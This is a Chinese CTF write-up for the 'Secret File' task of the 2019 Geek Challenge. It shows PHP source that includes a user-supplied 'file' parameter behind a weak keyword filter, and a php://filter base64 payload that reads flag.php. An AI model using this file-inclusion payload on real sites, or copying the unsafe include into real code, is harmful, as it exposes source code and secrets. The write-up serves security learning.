欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

极客大挑战2019 Secret File

程序员文章站 2022-07-16 16:18:24
...

0x00

题目类型:文件包含,php伪协议。

0x01

查看源代码,发现Archive_room.php,点进去看看。

极客大挑战2019 Secret File

点击SECRET按钮,发现有个页面一闪而过,而后重定向到了end.php,退回去用burp抓包。

极客大挑战2019 Secret File

访问secr3t.php,发现源码。

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>

用file参数访问flag.php,可以看到if语句中对file函数进行了一些判断,不过没什么用,直接用php伪协议读取文件。

0x02

payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

直接读出base64编码后的源码,再拿去解码一下,就拿到flag了。

相关标签: BUUOJ刷题记录